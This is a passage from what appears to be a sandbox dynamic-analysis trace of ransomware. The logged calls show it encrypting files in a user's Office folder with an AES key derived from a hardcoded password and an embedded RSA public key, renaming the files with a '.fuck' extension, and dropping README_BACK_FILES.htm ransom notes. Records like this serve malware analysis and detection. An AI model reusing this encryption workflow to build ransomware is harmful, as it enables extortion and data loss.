lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.887] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.888] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.888] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.888] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.888] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.888] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.892] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.906] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.906] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml.gsg")) returned 1 [0269.910] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml.fuck")) returned 1 [0269.912] CryptDestroyHash (hHash=0x2fa3c8) returned 1 [0269.912] CryptDestroyKey (hKey=0x2fa508) returned 1 [0269.912] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.912] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0269.912] FindClose (in: hFindFile=0x29383f8 | out: hFindFile=0x29383f8) returned 1 [0269.912] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\readme_back_files.htm")) returned 0xffffffff [0269.912] AreFileApisANSI () returned 1 [0269.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0269.912] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0269.913] GetFileType (hFile=0x5d44) returned 0x1 [0269.914] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0269.919] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0269.919] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\OTele\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2fa348 [0269.920] FindNextFileA (in: hFindFile=0x2fa348, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.920] FindNextFileA (in: hFindFile=0x2fa348, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0269.920] FindClose (in: hFindFile=0x2fa348 | out: hFindFile=0x2fa348) returned 1 [0269.920] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\OTele\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\otele\\readme_back_files.htm")) returned 0xffffffff [0269.920] AreFileApisANSI () returned 1 [0269.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28898f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0269.920] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\OTele\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\otele\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0269.923] GetFileType (hFile=0x5d44) returned 0x1 [0269.923] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0269.927] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0269.927] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0269.927] GetLastError () returned 0x0 [0269.927] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\powerp16.customui")) returned 0x20 [0269.928] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI", dwFileAttributes=0x80) returned 1 [0269.928] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\powerp16.customui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0269.929] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\powerp16.customui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.948] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI.gsg", dwFileAttributes=0x2) returned 1 [0269.949] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2f24b58) returned 1 [0269.951] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0269.951] lstrlenA (lpString="lmouxGpZErYqCdPYwMrzoSBazMlQm") returned 29 [0269.951] CryptHashData (hHash=0x2fa748, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.951] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2fa488) returned 1 [0269.951] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.951] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0269.951] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2f27198) returned 1 [0269.952] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27198, dwCertEncodingType=0x1, pInfo=0x2f32910*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32940*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32948*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2fa308) returned 1 [0269.952] CryptEncrypt (in: hKey=0x2fa308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0269.952] CryptEncrypt (in: hKey=0x2fa308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26ef0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2f26ef0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0269.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f26ef0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f26ef0*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0269.964] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0269.982] CryptEncrypt (in: hKey=0x2fa488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0269.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0269.988] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0269.988] CryptEncrypt (in: hKey=0x2fa488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0269.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0269.988] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0269.988] CryptEncrypt (in: hKey=0x2fa488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0269.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0269.988] ReadFile (in: hFile=0x5d44, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x344, lpOverlapped=0x0) returned 1 [0269.988] CryptEncrypt (in: hKey=0x2fa488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x344, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x350) returned 1 [0269.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x350, lpOverlapped=0x0) returned 1 [0269.988] CloseHandle (hObject=0x5d44) returned 1 [0269.988] CloseHandle (hObject=0x5d48) returned 1 [0269.988] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\powerp16.customui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\powerp16.customui"), bFailIfExists=0) returned 1 [0269.992] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI", dwFileAttributes=0x0) returned 1 [0269.992] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\powerp16.customui.gsg")) returned 1 [0269.994] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\powerp16.customui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\PowerP16.customUI.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\powerp16.customui.fuck")) returned 1 [0269.995] CryptDestroyHash (hHash=0x2fa748) returned 1 [0269.995] CryptDestroyKey (hKey=0x2fa488) returned 1 [0269.995] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.995] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0269.995] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0269.995] GetLastError () returned 0x0 [0269.995] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\word16.customui")) returned 0x20 [0269.995] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI", dwFileAttributes=0x80) returned 1 [0269.996] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\word16.customui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.997] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\word16.customui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0269.998] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI.gsg", dwFileAttributes=0x2) returned 1 [0269.998] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2f24b58) returned 1 [0270.001] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0270.001] lstrlenA (lpString="lmouxGpZErYqCdPYwMrzoSBazMlQm") returned 29 [0270.001] CryptHashData (hHash=0x2fa7c8, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.001] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa7c8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2fa908) returned 1 [0270.001] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.001] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0270.001] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2f26f78) returned 1 [0270.002] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26f78, dwCertEncodingType=0x1, pInfo=0x2f32430*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32460*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32468*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2fa5c8) returned 1 [0270.002] CryptEncrypt (in: hKey=0x2fa5c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0270.002] CryptEncrypt (in: hKey=0x2fa5c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26cd0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2f26cd0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0270.002] WriteFile (in: hFile=0x5d44, lpBuffer=0x2f26cd0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f26cd0*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0270.003] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0270.017] CryptEncrypt (in: hKey=0x2fa908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0270.017] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0270.019] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0270.019] CryptEncrypt (in: hKey=0x2fa908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0270.019] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0270.019] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0270.019] CryptEncrypt (in: hKey=0x2fa908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0270.019] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0270.020] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x33a, lpOverlapped=0x0) returned 1 [0270.020] CryptEncrypt (in: hKey=0x2fa908, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x33a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x340) returned 1 [0270.020] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x340, lpOverlapped=0x0) returned 1 [0270.020] CloseHandle (hObject=0x5d48) returned 1 [0270.020] CloseHandle (hObject=0x5d44) returned 1 [0270.020] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\word16.customui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\word16.customui"), bFailIfExists=0) returned 1 [0270.023] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI", dwFileAttributes=0x0) returned 1 [0270.023] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\word16.customui.gsg")) returned 1 [0270.025] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\word16.customui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\Word16.customUI.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\word16.customui.fuck")) returned 1 [0270.026] CryptDestroyHash (hHash=0x2fa7c8) returned 1 [0270.026] CryptDestroyKey (hKey=0x2fa908) returned 1 